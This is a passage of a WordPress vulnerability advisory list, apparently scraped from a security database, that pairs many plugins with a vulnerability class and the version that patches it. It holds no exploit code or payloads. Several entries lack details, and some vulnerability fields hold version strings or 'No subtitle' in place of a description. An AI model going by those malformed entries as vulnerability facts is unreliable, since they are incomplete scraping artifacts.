Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Captcha for WordPress

Vulnerability: Captcha Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Mobile Events Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Booster Elementor Addons

Plugin: Woodmart Core

Vulnerability: Authentication Bypass to Privilege Escalation
Patched Version: 1.0.37
Recommended Action: Update to version 1.0.37, or a newer patched version

Plugin: RokMicroNews

Vulnerability: Multiple Vulnerabilities
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Responsive CSS EDITOR

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery via aalChangeOptions function
Patched Version: 6.3.0.3
Recommended Action: Update to version 6.3.0.3, or a newer patched version

Plugin: Royal Custom CSS for Page and Post

Plugin: CPT Shortcode Generator

Plugin: Perfmatters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Baggage Freight Shipping Australia

Plugin: 360 Product Rotation

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Privilege Escalation
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Events Made Easy

Vulnerability: SQL Injection
Patched Version: 2.2.81
Recommended Action: Update to version 2.2.81, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Missing Authorization
Patched Version: 2.0.5.4.1
Recommended Action: Update to version 2.0.5.4.1, or a newer patched version

Plugin: Snap Pixel

Plugin: Unlimited PopUps

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Event List

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 0.7.10
Recommended Action: Update to version 0.7.10, or a newer patched version

Plugin: Role Scoper (Obsolete – Please install PublishPress Permissions)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.65
Recommended Action: Update to version 1.3.65, or a newer patched version

Plugin: Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Featured Post Creative

Vulnerability: Missing Authorization via wpfp_update_featured_post
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.19
Recommended Action: Update to version 2.2.19, or a newer patched version

Plugin: WordPress Integrator

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via gallery_name
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: XO Security

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Privilege Escalation
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: All In One Login — WordPress Login Security Plugin to Protect and Customize WP Admin

Vulnerability: Missing Authorization Checks
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: MW WP Form

Vulnerability: Missing Authorization
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: FormBuilder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: WP Activity Log

Vulnerability: 2.4.3
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: WP Humans.txt

Plugin: Zotpress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.4
Recommended Action: Update to version 7.3.4, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.0.3
Recommended Action: Update to version 1.14.0.3, or a newer patched version

Plugin: WP-dTree

Plugin: Site Reviews

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.17.3
Recommended Action: Update to version 5.17.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary File Deletion/Read
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Unlimited PopUps

Plugin: Lucky Wheel for WooCommerce – Spin a Sale

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Authenticated(Admin+) SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated SQL Injection
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: bbPress Move Topics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Multiple Unprotected AJAX Actions
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Contact Form Builder by vcita

Plugin: Ads by datafeedr.com

Plugin: Schedule Posts Calendar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Missing Authorization
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Bookshelf

Plugin: View All Post's Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: WP Job Manager

Vulnerability: PHP Object Injection
Patched Version: 1.29.3
Recommended Action: Update to version 1.29.3, or a newer patched version

Plugin: Recently viewed and most viewed products

Vulnerability: Authenticated (Shop Manager+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Coming Soon Page & Maintenance Mode

Vulnerability: Unauthenticated Settings Reset
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Restrict – membership, site, content and user access restrictions for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Simple Slideshow Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Stop Spam Comments

Vulnerability: Protection Mechanism Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Unconfirmed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Car Dealer (Dealership) and Vehicle sales

Vulnerability: Missing Authorization to Arbitrary Plugin Installation
Patched Version: 3.05
Recommended Action: Update to version 3.05, or a newer patched version

Plugin: WP Review Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 12.8
Recommended Action: Update to version 12.8, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 8.1.6
Recommended Action: Update to version 8.1.6, or a newer patched version

Plugin: WP Plugin Manager – Deactivate plugins per page

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Role Based Pricing for WooCommerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Easy Bootstrap Shortcode

Plugin: Table of Contents Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 2309
Recommended Action: Update to version 2309, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: SpeakOut! Email Petitions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: RSS Feed Retriever

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.52
Recommended Action: Update to version 7.13.52, or a newer patched version

Plugin: WP GPX Maps

Vulnerability: Missing Authorization
Patched Version: 1.7.06
Recommended Action: Update to version 1.7.06, or a newer patched version

Plugin: WP125

Vulnerability: Cross-Site Request Forgery to Arbitrary Ad Deletion
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Dewplayer

Vulnerability: Content Spoofing/Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bitcoin / AltCoin Payment Gateway for WooCommerce & Multivendor store / shop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.23
Recommended Action: Update to version 2.1.23, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: Careerfy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Yotpo Reviews for WooCommerce (Unofficial)

Plugin: Colorful Categories

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Register IPs

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Hotel Listing

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: wp-smiley

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Import Deletion
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: StaffList

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Advanced Recent Posts

Plugin: Tiempo.com

Plugin: MapPress Maps for WordPress

Vulnerability: Admin+ File Upload to Remote Code Execution
Patched Version: 2.73.13
Recommended Action: Update to version 2.73.13, or a newer patched version

Plugin: Seos Contact Form

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_delete_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: About Me 3000 widget

Plugin: Advanced Database Cleaner

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Team Manager – WordPress Showcase Team Members

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: White Label CMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Missing Authorization
Patched Version: 1.4.38
Recommended Action: Update to version 1.4.38, or a newer patched version

Plugin: Goodnews – Responsive WordPress News/Magazine | News / Editorial

Plugin: Email Verification / SMS Verification / OTP Verification / OTP Authentication / WooCommerce Notification

Vulnerability: Missing Authorization via dismiss_notice
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via title
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: ContentStudio

Vulnerability: Information Exposure
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Schreikasten

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Checker

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 1.11.17
Recommended Action: Update to version 1.11.17, or a newer patched version

Core: WordPress

Vulnerability: Shortcode Execution in User Generated Content
Patched Version: 5.9.6
Recommended Action: Update to one of the following versions, or a newer patched version: 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Easy Accordion FAQ and Knowledge Base Software for WordPress

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: USM Premium

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 16.3
Recommended Action: Update to version 16.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting and Setting Changes
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Revive Social – Social Media Auto Post and Scheduling Automation Plugin

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 9.0.11
Recommended Action: Update to version 9.0.11, or a newer patched version

Plugin: WP TripAdvisor Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 10.8
Recommended Action: Update to version 10.8, or a newer patched version

Plugin: simply-poll

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WPFront User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1.11184
Recommended Action: Update to version 3.2.1.11184, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Ldap WP Login / Active Directory Integration

Vulnerability: Missing Authorization
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.9.1
Recommended Action: Update to version 3.3.9.1, or a newer patched version

Plugin: µAudio Player

Vulnerability: Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: PHP Object Injection Gadget
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.8, 5.2.9, 5.3.6, 5.4.4, 5.5.3

Core: WordPress

Vulnerability: Cross-Site Scripting via Ephox in Plupload
Patched Version: 3.7.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.6, 3.8.6, 3.9.4, 4.0.2, 4.1.2

Plugin: Download Plugin

Vulnerability: Missing Authorization and Sensitive Information Exposure
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Super Cache

Vulnerability: PHP Object Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: 1003 Mortgage Application

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.80
Recommended Action: Update to version 1.80, or a newer patched version

Plugin: Image Slider

Vulnerability: Cross-Site Request Forgery to Post Duplication
Patched Version: 1.1.123
Recommended Action: Update to version 1.1.123, or a newer patched version

Plugin: Amministrazione Trasparente

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Post Previews
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Restaurant Reservations

Vulnerability: SQL Injection
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Rocket Font

Vulnerability: Cross-Site Request Forgery via update_option_check_match_default
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Unauthenticated CSV Injection
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: MicroCopy

Plugin: Media Library Assistant

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Read
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: MojoPlug Slide Panel

Plugin: Download Manager

Vulnerability: Sensitive Information Disclosure via Directory Listing
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Profile Creation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Responsive Zoom In/Out Slider WordPress Plugin

Plugin: WordPress Simple Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Missing Authorization
Patched Version: 3.8.10
Recommended Action: Update to version 3.8.10, or a newer patched version

Plugin: Images to WebP

Vulnerability: Local File Inclusion
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Easy Post Types

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Admin Log

Plugin: Email Artillery (MASS EMAIL)

Plugin: Yada Wiki

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Email Subscription Popup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Insufficient Authorization to Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Catch Web Tools

Vulnerability: Missing Authorization
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: All in One Invite Codes

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Article Directory Redux

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Admin Access via Password Reset
Patched Version: 3.4.9
Recommended Action: Update to version 3.4.9, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Missing Authorization
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images – Lite

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Wp2android

Plugin: InfiniteWP Client

Vulnerability: Authentication Bypass
Patched Version: 1.9.4.5
Recommended Action: Update to version 1.9.4.5, or a newer patched version

Plugin: Logaster Logo Generator

Vulnerability: Missing Authorization to Arbitrary Media Deletion and Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Remote File Inclusion leading to Remote Code Execution via Cross-Site Request Forgery
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 12.0.9
Recommended Action: Update to version 12.0.9, or a newer patched version

Plugin: Formidable PRO2PDF

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: Responsive Contact Form Builder & Lead Generation Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Protection Bypass of Renamed Login Page via URL Encoding
Patched Version: 5.2.5
Recommended Action: Update to version 5.2.5, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Authenticated (Admin+) Arbitrary OS File Access via Path Traversal
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Ordering
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Autoptimize

Vulnerability: Arbitrary File Upload (and Remote Code Execution) via Import Settings
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Arbitrary Post Deletion via Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Cross-site request forgery via a request in the CF7DBPluginSubmissions page to wp-admin/admin.php
Patched Version: 2.8.32
Recommended Action: Update to version 2.8.32, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Test Email Sending
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: CRM WordPress Plugin – RepairBuddy

Vulnerability: SQL Injection
Patched Version: 3.73
Recommended Action: Update to version 3.73, or a newer patched version

Plugin: Csomagpontok és Címkék WooCommerce-hez

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.0.3
Recommended Action: Update to version 1.9.0.3, or a newer patched version

Plugin: WooCommerce Address Book

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GD bbPress Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Exchange Addon Invoices

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Admin+ Stored Cross-Site Cross-Site Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘Feed[title]’
Patched Version: 10.2.4
Recommended Action: Update to version 10.2.4, or a newer patched version

Plugin: PDF Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: embed-articles

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Lite <= 1.5.5
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Insufficient Authorization on Mulitple AJAX Actions
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Edwiser Bridge – WordPress Moodle LMS Integration

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Photospace Responsive Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Missing Authorization
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: Schema Pro

Vulnerability: Authenticated(Contributor+) Missing Authorization
Patched Version: 2.7.9
Recommended Action: Update to version 2.7.9, or a newer patched version

Plugin: Quards

Plugin: Photoswipe Masonry Gallery

Vulnerability: No subtitle
Patched Version: 1.2.15
Recommended Action: Update to version 1.2.15, or a newer patched version

Plugin: Blog Designer – Post and Widget

Vulnerability: Post and Widget <= 2.3
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: FancyBox for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Exclusive Addons for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Dropbox Folder Share

Plugin: RSVPMaker

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: LoginWP (Formerly Peter's Login Redirect)

Vulnerability: Reflected Cross-Site Scripting via rul_login_url, rul_logout_url Parameter
Patched Version: 3.0.0.5
Recommended Action: Update to version 3.0.0.5, or a newer patched version

Plugin: WP AmASIN – The Amazon Affiliate Shop

Vulnerability: Local File Inclusion
Patched Version: 0.9.7
Recommended Action: Update to version 0.9.7, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Import WooCommerce Suite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
